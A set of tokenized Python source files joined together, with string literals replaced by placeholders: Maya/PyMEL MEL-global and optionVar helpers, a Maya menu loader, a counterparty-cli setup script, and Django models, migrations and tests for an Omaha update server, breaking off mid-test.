<EOL> try : <EOL> return getMelType ( pyObj [ <NUM_LIT:0> ] , exactOnly = True ) + '<STR_LIT>' <EOL> except IndexError : <EOL> return '<STR_LIT>' <EOL> except : <EOL> return <EOL> if isinstance ( pyObj , basestring ) : return '<STR_LIT:string>' <EOL> elif allowBool and isinstance ( pyObj , bool ) : return '<STR_LIT:bool>' <EOL> elif isinstance ( pyObj , int ) : return '<STR_LIT:int>' <EOL> elif isinstance ( pyObj , float ) : return '<STR_LIT:float>' <EOL> elif not exactOnly : <EOL> return type ( pyObj ) . __name__ <EOL> class MelGlobals ( dict ) : <EOL> """<STR_LIT>""" <EOL> melTypeToPythonType = { <EOL> '<STR_LIT:string>' : str , <EOL> '<STR_LIT:int>' : int , <EOL> '<STR_LIT:float>' : float , <EOL> '<STR_LIT>' : datatypes . Vector <EOL> } <EOL> class MelGlobalArray ( util . defaultlist ) : <EOL> def __init__ ( self , type , variable , * args , ** kwargs ) : <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> type = type [ : - <NUM_LIT:2> ] <EOL> pyType = MelGlobals . melTypeToPythonType [ type ] <EOL> util . defaultlist . __init__ ( self , pyType , * args , ** kwargs ) <EOL> declaration = MelGlobals . _get_decl_statement ( type , variable ) <EOL> self . _setItemCmd = "<STR_LIT>" % ( declaration , variable ) <EOL> self . _setItemCmd += '<STR_LIT>' <EOL> def __setitem__ ( self , index , value ) : <EOL> _mm . eval ( self . _setItemCmd % ( index , pythonToMel ( value ) ) ) <EOL> super ( MelGlobalArray , self ) . __setitem__ ( index , value ) <EOL> setItem = __setitem__ <EOL> def append ( self , val ) : raise AttributeError <EOL> def extend ( self , val ) : raise AttributeError <EOL> typeMap = { } <EOL> VALID_TYPES = MELTYPES <EOL> def __getitem__ ( self , variable ) : <EOL> return self . __class__ . get ( variable ) <EOL> def __setitem__ ( self , variable , value ) : <EOL> return self . __class__ . set ( variable , value ) <EOL> @ classmethod <EOL> def _formatVariable ( cls , variable ) : <EOL> if not variable . startswith ( '<STR_LIT:$>' ) : <EOL> variable = '<STR_LIT:$>' + variable <EOL> if variable . endswith ( '<STR_LIT>' ) : <EOL> variable = variable [ : - <NUM_LIT:2> ] <EOL> return variable <EOL> @ classmethod <EOL> def getType ( cls , variable ) : <EOL> variable = cls . _formatVariable ( variable ) <EOL> info = mel . whatIs ( variable ) . split ( ) <EOL> if len ( info ) == <NUM_LIT:2> and info [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> MelGlobals . typeMap [ variable ] = info [ <NUM_LIT:0> ] <EOL> return info [ <NUM_LIT:0> ] <EOL> raise TypeError , "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_decl_statement ( cls , type , variable ) : <EOL> decl_name = cls . _formatVariable ( variable ) <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> type = type [ : - <NUM_LIT:2> ] <EOL> decl_name += '<STR_LIT>' <EOL> return "<STR_LIT>" % ( type , decl_name ) <EOL> @ classmethod <EOL> def initVar ( cls , type , variable ) : <EOL> if type not in MELTYPES : <EOL> raise TypeError , "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( [ "<STR_LIT>" % x for x in MELTYPES ] ) <EOL> variable = cls . _formatVariable ( variable ) <EOL> _mm . eval ( cls . _get_decl_statement ( type , variable ) ) <EOL> MelGlobals . typeMap [ variable ] = type <EOL> return variable <EOL> @ classmethod <EOL> def get ( cls , variable , type = None ) : <EOL> """<STR_LIT>""" <EOL> variable = cls . _formatVariable ( variable ) <EOL> if type is None : <EOL> try : <EOL> type = MelGlobals . typeMap [ variable ] <EOL> except KeyError : <EOL> try : <EOL> type = cls . getType ( variable ) <EOL> except TypeError : <EOL> raise KeyError , variable <EOL> variable = cls . initVar ( type , variable ) <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> array = True <EOL> proc_name = '<STR_LIT>' + type . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> array = False <EOL> proc_name = '<STR_LIT>' + type <EOL> declaration = cls . _get_decl_statement ( type , variable ) <EOL> cmd = "<STR_LIT>" % ( type , proc_name , declaration , variable , proc_name ) <EOL> res = _mm . eval ( cmd ) <EOL> if array : <EOL> return MelGlobals . MelGlobalArray ( type , variable , res ) <EOL> else : <EOL> return MelGlobals . melTypeToPythonType [ type ] ( res ) <EOL> @ classmethod <EOL> def set ( cls , variable , value , type = None ) : <EOL> """<STR_LIT>""" <EOL> variable = cls . _formatVariable ( variable ) <EOL> if type is None : <EOL> try : <EOL> type = MelGlobals . typeMap [ variable ] <EOL> except KeyError : <EOL> type = cls . getType ( variable ) <EOL> variable = cls . initVar ( type , variable ) <EOL> declaration = cls . _get_decl_statement ( type , variable ) <EOL> cmd = "<STR_LIT>" % ( declaration , variable , pythonToMel ( value ) ) <EOL> _mm . eval ( cmd ) <EOL> @ classmethod <EOL> def keys ( cls ) : <EOL> """<STR_LIT>""" <EOL> return mel . env ( ) <EOL> melGlobals = MelGlobals ( ) <EOL> def getMelGlobal ( type , variable ) : <EOL> return melGlobals . get ( variable , type ) <EOL> def setMelGlobal ( type , variable , value ) : <EOL> return melGlobals . set ( variable , value , type ) <EOL> class Catch ( object ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> success = None <EOL> def __call__ ( self , func , * args , ** kwargs ) : <EOL> try : <EOL> Catch . result = func ( * args , ** kwargs ) <EOL> Catch . success = True <EOL> return <NUM_LIT:0> <EOL> except : <EOL> Catch . success = False <EOL> return <NUM_LIT:1> <EOL> def reset ( self ) : <EOL> Catch . result = None <EOL> Catch . success = None <EOL> catch = Catch ( ) <EOL> class OptionVarList ( tuple ) : <EOL> def __new__ ( cls , val , key ) : <EOL> self = tuple . __new__ ( cls , val ) <EOL> return self <EOL> def __init__ ( self , val , key ) : <EOL> self . key = key <EOL> def __setitem__ ( self , key , val ) : <EOL> raise TypeError , '<STR_LIT>' % self . __class__ . __name__ <EOL> def appendVar ( self , val ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( val , basestring ) : <EOL> return cmds . optionVar ( stringValueAppend = [ self . key , val ] ) <EOL> if isinstance ( val , int ) : <EOL> return cmds . optionVar ( intValueAppend = [ self . key , val ] ) <EOL> if isinstance ( val , float ) : <EOL> return cmds . optionVar ( floatValueAppend = [ self . key , val ] ) <EOL> raise TypeError , '<STR_LIT>' <EOL> append = appendVar <EOL> class OptionVarDict ( object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return cmds . optionVar ( * args , ** kwargs ) <EOL> def __contains__ ( self , key ) : <EOL> return self . has_key ( key ) <EOL> def has_key ( self , key ) : <EOL> return bool ( cmds . optionVar ( exists = key ) ) <EOL> def __getitem__ ( self , key ) : <EOL> if not self . has_key ( key ) : <EOL> raise KeyError , key <EOL> val = cmds . optionVar ( q = key ) <EOL> if isinstance ( val , list ) : <EOL> val = OptionVarList ( val , key ) <EOL> return val <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __setitem__ ( self , key , val ) : <EOL> if isinstance ( val , basestring ) : <EOL> return cmds . optionVar ( stringValue = [ key , val ] ) <EOL> if isinstance ( val , ( int , bool ) ) : <EOL> return cmds . optionVar ( intValue = [ key , int ( val ) ] ) <EOL> if isinstance ( val , float ) : <EOL> return cmds . optionVar ( floatValue = [ key , val ] ) <EOL> if isinstance ( val , ( list , tuple ) ) : <EOL> if len ( val ) == <NUM_LIT:0> : <EOL> return cmds . optionVar ( clearArray = key ) <EOL> listType = type ( val [ <NUM_LIT:0> ] ) <EOL> if issubclass ( listType , basestring ) : <EOL> flag = '<STR_LIT>' <EOL> elif issubclass ( listType , int ) : <EOL> flag = '<STR_LIT>' <EOL> elif issubclass ( listType , float ) : <EOL> flag = '<STR_LIT>' <EOL> else : <EOL> raise TypeError , ( '<STR_LIT>' % listType ) <EOL> cmds . optionVar ( ** { flag : [ key , val [ <NUM_LIT:0> ] ] } ) <EOL> flag += "<STR_LIT>" <EOL> for elem in val [ <NUM_LIT:1> : ] : <EOL> if not isinstance ( elem , listType ) : <EOL> raise TypeError , '<STR_LIT>' <EOL> cmds . optionVar ( ** { flag : [ key , elem ] } ) <EOL> def keys ( self ) : <EOL> return cmds . optionVar ( list = True ) <EOL> def values ( self ) : <EOL> return [ self [ key ] for key in self . keys ( ) ] <EOL> def pop ( self , key ) : <EOL> val = cmds . optionVar ( q = key ) <EOL> cmds . optionVar ( remove = key ) <EOL> return val <EOL> def __delitem__ ( self , key ) : <EOL> self . pop ( key ) <EOL> def iterkeys ( self ) : <EOL> for key in self . keys ( ) : <EOL> yield key <EOL> __iter__ = iterkeys <EOL> def itervalues ( self ) : <EOL> for key in self . keys ( ) : <EOL> yield self [ key ] <EOL> def iteritems ( self ) : <EOL> for key in self . keys ( ) : <EOL> yield key , self [ key ] <EOL> optionVar = OptionVarDict ( ) <EOL> class Env ( object ) : <EOL> """<STR_LIT>""" <EOL> optionVars = OptionVarDict ( ) <EOL> envVars = os . environ <EOL> def setConstructionHistory ( self , state ) : <EOL> cmds . constructionHistory ( tgl = state ) <EOL> def getConstructionHistory ( self ) : <EOL> return cmds . constructionHistory ( q = True , tgl = True ) <EOL> def sceneName ( self ) : <EOL> return system . Path ( cmds . file ( q = <NUM_LIT:1> , sn = <NUM_LIT:1> ) ) <EOL> def setUpAxis ( self , axis , rotateView = False ) : <EOL> """<STR_LIT>""" <EOL> cmds . upAxis ( axis = axis , rotateView = rotateView ) <EOL> def getUpAxis ( self ) : <EOL> """<STR_LIT>""" <EOL> return cmds . upAxis ( q = True , axis = True ) <EOL> def user ( self ) : <EOL> return _getuser ( ) <EOL> def host ( self ) : <EOL> return _gethostname ( ) <EOL> def getTime ( self ) : <EOL> return cmds . currentTime ( q = <NUM_LIT:1> ) <EOL> def setTime ( self , val ) : <EOL> cmds . currentTime ( val ) <EOL> time = property ( getTime , setTime ) <EOL> def getMinTime ( self ) : <EOL> return cmds . playbackOptions ( q = <NUM_LIT:1> , minTime = <NUM_LIT:1> ) <EOL> def setMinTime ( self , val ) : <EOL> cmds . playbackOptions ( minTime = val ) <EOL> minTime = property ( getMinTime , setMinTime ) <EOL> def getMaxTime ( self ) : <EOL> return cmds . playbackOptions ( q = <NUM_LIT:1> , maxTime = <NUM_LIT:1> ) <EOL> def setMaxTime ( self , val ) : <EOL> cmds . playbackOptions ( maxTime = val ) <EOL> maxTime = property ( getMaxTime , setMaxTime ) <EOL> def getAnimStartTime ( self ) : <EOL> return cmds . playbackOptions ( q = <NUM_LIT:1> , animationStartTime = <NUM_LIT:1> ) <EOL> def setAnimStartTime ( self , val ) : <EOL> cmds . playbackOptions ( animationStartTime = val ) <EOL> animStartTime = property ( getAnimStartTime , setAnimStartTime ) <EOL> def getAnimEndTime ( self ) : <EOL> return cmds . playbackOptions ( q = <NUM_LIT:1> , animationEndTime = <NUM_LIT:1> ) <EOL> def setAnimEndTime ( self , val ) : <EOL> cmds . playbackOptions ( animationEndTime = val ) <EOL> animEndTime = property ( getAnimEndTime , setAnimEndTime ) <EOL> env = Env ( ) <EOL> class MelError ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MelConversionError ( MelError , TypeError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MelUnknownProcedureError ( MelError , NameError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MelArgumentError ( MelError , TypeError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MelSyntaxError ( MelError , SyntaxError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Mel ( object ) : <EOL> """<STR_LIT>""" <EOL> proc = None <EOL> def __getattr__ ( self , command ) : <EOL> if command . startswith ( '<STR_LIT>' ) and command . endswith ( '<STR_LIT>' ) : <EOL> try : <EOL> return self . __dict__ [ command ] <EOL> except KeyError : <EOL> raise AttributeError , "<STR_LIT>" % command <EOL> def _call ( * args , ** kwargs ) : <EOL> cmd = pythonToMelCmd ( command , * args , ** kwargs ) <EOL> try : <EOL> self . __class__ . proc = command <EOL> return self . eval ( cmd ) <EOL> finally : <EOL> self . __class__ . proc = None <EOL> return _call <EOL> @ classmethod <EOL> def mprint ( cls , * args ) : <EOL> """<STR_LIT>""" <EOL> _mm . eval ( r"""<STR_LIT>""" % pythonToMel ( '<STR_LIT:U+0020>' . join ( map ( str , args ) ) ) + '<STR_LIT:\n>' ) <EOL> @ classmethod <EOL> def source ( cls , script , language = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if language == '<STR_LIT>' : <EOL> cls . eval ( """<STR_LIT>""" % script ) <EOL> elif language == '<STR_LIT>' : <EOL> script = util . path ( script ) <EOL> modulePath = script . namebase <EOL> folder = script . parent <EOL> print modulePath <EOL> if not sys . modules . has_key ( modulePath ) : <EOL> print "<STR_LIT>" <EOL> module = __import__ ( modulePath , globals ( ) , locals ( ) , [ '<STR_LIT>' ] ) <EOL> sys . modules [ modulePath ] = module <EOL> else : <EOL> raise TypeError , "<STR_LIT>" % language <EOL> @ classmethod <EOL> def eval ( cls , cmd ) : <EOL> """<STR_LIT>""" <EOL> undoState = _mc . undoInfo ( q = <NUM_LIT:1> , state = <NUM_LIT:1> ) <EOL> lineNumbers = _mc . commandEcho ( q = <NUM_LIT:1> , lineNumbers = <NUM_LIT:1> ) <EOL> _mc . commandEcho ( lineNumbers = <NUM_LIT:1> ) <EOL> global errors <EOL> errors = [ ] <EOL> def errorCallback ( nativeMsg , messageType , data ) : <EOL> global errors <EOL> if messageType == _api . MCommandMessage . kError : <EOL> if nativeMsg : <EOL> errors += [ nativeMsg ] <EOL> id = _api . MCommandMessage . addCommandOutputCallback ( errorCallback , None ) <EOL> try : <EOL> res = _api . MCommandResult ( ) <EOL> _api . MGlobal . executeCommand ( cmd , res , False , undoState ) <EOL> except Exception : <EOL> _api . MMessage . removeCallback ( id ) <EOL> _mc . commandEcho ( lineNumbers = lineNumbers ) <EOL> if hasattr ( id , '<STR_LIT>' ) : <EOL> id . disown ( ) <EOL> msg = '<STR_LIT:\n>' . join ( errors ) <EOL> if '<STR_LIT>' in msg : <EOL> e = MelUnknownProcedureError <EOL> elif '<STR_LIT>' in msg : <EOL> e = MelArgumentError <EOL> if cls . proc : <EOL> msg = msg . split ( '<STR_LIT:\n>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] . lstrip ( ) <EOL> elif '<STR_LIT>' in msg or '<STR_LIT>' in msg : <EOL> e = MelConversionError <EOL> elif '<STR_LIT>' in msg : <EOL> e = MelSyntaxError <EOL> else : <EOL> e = MelError <EOL> message = "<STR_LIT>" % ( msg ) <EOL> fmtCmd = '<STR_LIT:\n>' . join ( [ '<STR_LIT:U+0020>' + x for x in cmd . split ( '<STR_LIT:\n>' ) ] ) <EOL> if cls . proc : <EOL> if e is not MelUnknownProcedureError : <EOL> file = _mm . eval ( '<STR_LIT>' % cls . proc ) <EOL> if file . startswith ( '<STR_LIT>' ) : <EOL> file = '<STR_LIT>' % os . path . realpath ( file . split ( '<STR_LIT::>' ) [ <NUM_LIT:1> ] . lstrip ( ) ) <EOL> message += '<STR_LIT>' % ( cls . proc , file ) <EOL> message += '<STR_LIT:\n>' + fmtCmd <EOL> else : <EOL> message += '<STR_LIT>' % fmtCmd <EOL> raise e , message <EOL> else : <EOL> _api . MMessage . removeCallback ( id ) <EOL> _mc . commandEcho ( lineNumbers = lineNumbers ) <EOL> if hasattr ( id , '<STR_LIT>' ) : <EOL> id . disown ( ) <EOL> resType = res . resultType ( ) <EOL> if resType == _api . MCommandResult . kInvalid : <EOL> return <EOL> elif resType == _api . MCommandResult . kInt : <EOL> result = _api . SafeApiPtr ( '<STR_LIT:int>' ) <EOL> res . getResult ( result ( ) ) <EOL> return result . get ( ) <EOL> elif resType == _api . MCommandResult . kIntArray : <EOL> result = _api . MIntArray ( ) <EOL> res . getResult ( result ) <EOL> return [ result [ i ] for i in range ( result . length ( ) ) ] <EOL> elif resType == _api . MCommandResult . kDouble : <EOL> result = _api . SafeApiPtr ( '<STR_LIT>' ) <EOL> res . getResult ( result ( ) ) <EOL> return result . get ( ) <EOL> elif resType == _api . MCommandResult . kDoubleArray : <EOL> result = _api . MDoubleArray ( ) <EOL> res . getResult ( result ) <EOL> return [ result [ i ] for i in range ( result . length ( ) ) ] <EOL> elif resType == _api . MCommandResult . kString : <EOL> return res . stringResult ( ) <EOL> elif resType == _api . MCommandResult . kStringArray : <EOL> result = [ ] <EOL> res . getResult ( result ) <EOL> return result <EOL> elif resType == _api . MCommandResult . kVector : <EOL> result = _api . MVector ( ) <EOL> res . getResult ( result ) <EOL> return datatypes . Vector ( result ) <EOL> elif resType == _api . MCommandResult . kVectorArray : <EOL> result = _api . MVectorArray ( ) <EOL> res . getResult ( result ) <EOL> return [ datatypes . Vector ( result [ i ] ) for i in range ( result . length ( ) ) ] <EOL> elif resType == _api . MCommandResult . kMatrix : <EOL> result = _api . MMatrix ( ) <EOL> res . getResult ( result ) <EOL> return datatypes . Matrix ( result ) <EOL> elif resType == _api . MCommandResult . kMatrixArray : <EOL> result = _api . MMatrixArray ( ) <EOL> res . getResult ( result ) <EOL> return [ datatypes . Matrix ( result [ i ] ) for i in range ( result . length ( ) ) ] <EOL> @ staticmethod <EOL> def error ( msg , showLineNumber = False ) : <EOL> if showLineNumber : <EOL> flags = '<STR_LIT>' <EOL> else : <EOL> flags = '<STR_LIT>' <EOL> _mm . eval ( """<STR_LIT>""" % ( flags , pythonToMel ( msg ) ) ) <EOL> @ staticmethod <EOL> def warning ( msg , showLineNumber = False ) : <EOL> if showLineNumber : <EOL> flags = '<STR_LIT>' <EOL> else : <EOL> flags = '<STR_LIT>' <EOL> _mm . eval ( """<STR_LIT>""" % ( flags , pythonToMel ( msg ) ) ) <EOL> @ staticmethod <EOL> def trace ( msg , showLineNumber = False ) : <EOL> if showLineNumber : <EOL> flags = '<STR_LIT>' <EOL> else : <EOL> flags = '<STR_LIT>' <EOL> _mm . eval ( """<STR_LIT>""" % ( flags , pythonToMel ( msg ) ) ) <EOL> @ staticmethod <EOL> def tokenize ( * args ) : <EOL> raise NotImplementedError , "<STR_LIT>" <EOL> mel = Mel ( ) <EOL> def conditionExists ( conditionName ) : <EOL> """<STR_LIT>""" <EOL> return conditionName in cmds . scriptJob ( listConditions = True ) <EOL> _factories . createFunctions ( __name__ ) </s>
<s> """<STR_LIT>""" <EOL> import imp <EOL> import os <EOL> import sys <EOL> import common . core <EOL> menuModulePath = '<STR_LIT>' % common . core . globalVariables . toolsLocation <EOL> if os . path . exists ( menuModulePath ) : <EOL> sys . path . append ( os . path . split ( menuModulePath ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> fp , pathname , description = imp . find_module ( os . path . basename ( menuModulePath ) . strip ( '<STR_LIT>' ) ) <EOL> startModule = imp . load_module ( os . path . basename ( menuModulePath ) . strip ( '<STR_LIT>' ) , fp , pathname , description ) <EOL> startModule . MayaMenu ( ) . startUp ( ) <EOL> print "<STR_LIT>" </s>
<s> '''<STR_LIT>''' </s>
<s> from setuptools . command . install import install as _install <EOL> from setuptools import setup , find_packages , Command <EOL> import os , sys <EOL> import shutil <EOL> import ctypes . util <EOL> import configparser , platform <EOL> from counterpartycli import APP_VERSION <EOL> class generate_configuration_files ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> from counterpartycli . setup import generate_config_files <EOL> generate_config_files ( ) <EOL> class install ( _install ) : <EOL> description = "<STR_LIT>" <EOL> def run ( self ) : <EOL> caller = sys . _getframe ( <NUM_LIT:2> ) <EOL> caller_module = caller . f_globals . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> caller_name = caller . f_code . co_name <EOL> if caller_module == '<STR_LIT>' or caller_name == '<STR_LIT>' : <EOL> _install . run ( self ) <EOL> else : <EOL> self . do_egg_install ( ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> required_packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup_options = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : APP_VERSION , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' + APP_VERSION , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : find_packages ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : required_packages , <EOL> '<STR_LIT>' : required_packages , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : install , <EOL> '<STR_LIT>' : generate_configuration_files <EOL> } <EOL> } <EOL> if sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> import py2exe <EOL> from py2exe . distutils_buildexe import py2exe as _py2exe <EOL> WIN_DIST_DIR = '<STR_LIT>' . format ( APP_VERSION ) <EOL> class py2exe ( _py2exe ) : <EOL> def run ( self ) : <EOL> from counterpartycli . setup import before_py2exe_build , after_py2exe_build <EOL> before_py2exe_build ( WIN_DIST_DIR ) <EOL> _py2exe . run ( self ) <EOL> after_py2exe_build ( WIN_DIST_DIR ) <EOL> setup_options . update ( { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : WIN_DIST_DIR <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : py2exe <EOL> } <EOL> } ) <EOL> elif sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> setup_options [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> setup_options [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> setup ( ** setup_options ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . files . uploadedfile import SimpleUploadedFile <EOL> from django . db . models import signals <EOL> import factory <EOL> class SymbolsFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT:U+0020>' * <NUM_LIT> ) <EOL> debug_id = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> debug_file = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> class CrashFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> appid = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> userid = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> meta = { '<STR_LIT>' : '<STR_LIT>' } <EOL> signature = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> @ factory . django . mute_signals ( signals . post_save ) <EOL> class CrashFactoryWithFiles ( CrashFactory ) : <EOL> archive = factory . django . FileField ( filename = '<STR_LIT>' ) <EOL> upload_file_minidump = factory . django . FileField ( filename = '<STR_LIT>' ) <EOL> class CrashDescriptionFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> crash = factory . lazy_attribute ( lambda x : CrashFactory ( ) ) <EOL> summary = '<STR_LIT>' <EOL> description = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django_extensions . db . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from django . db . models . query import QuerySet <EOL> from django . db import models <EOL> from django . db . models import F , Sum <EOL> class FeedbackQuerySet ( QuerySet ) : <EOL> def filter_by_enabled ( self , * args , ** kwargs ) : <EOL> return self . filter ( is_enabled = True , * args , ** kwargs ) <EOL> def get_size ( self ) : <EOL> return self . aggregate ( size = Sum ( F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) ) ) [ '<STR_LIT:size>' ] or <NUM_LIT:0> <EOL> class FeedbackManager ( models . Manager ) : <EOL> def get_queryset ( self ) : <EOL> return FeedbackQuerySet ( self . model , using = self . _db ) <EOL> def __getattr__ ( self , name ) : <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> raise AttributeError <EOL> else : <EOL> return getattr ( self . get_queryset ( ) , name ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls import url <EOL> from views import status <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , status , name = '<STR_LIT:status>' ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , models . PositiveSmallIntegerField ( choices = [ ( <NUM_LIT:1> , b'<STR_LIT>' ) , ( <NUM_LIT:0> , b'<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT:index>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT:value>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT:version>' , models . ForeignKey ( to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from uuid import UUID <EOL> from bitmapist import mark_event <EOL> from django . test import TestCase <EOL> from django . core . files . uploadedfile import SimpleUploadedFile <EOL> from omaha . tests . utils import temporary_media_root <EOL> from omaha . factories import VersionFactory <EOL> from omaha . builder import get_version <EOL> from omaha . models import PartialUpdate , Version , Channel , ACTIVE_USERS_DICT_CHOICES <EOL> from omaha . utils import redis , get_id <EOL> @ temporary_media_root ( ) <EOL> class BuilderTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> redis . flushdb ( ) <EOL> def tearDown ( self ) : <EOL> redis . flushdb ( ) <EOL> def test_get_version ( self ) : <EOL> userid = '<STR_LIT>' <EOL> version = VersionFactory . create ( file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> def test_get_version_partial_update ( self ) : <EOL> userid = "<STR_LIT>" % UUID ( int = <NUM_LIT:1> ) <EOL> userid_beta = "<STR_LIT>" % UUID ( int = 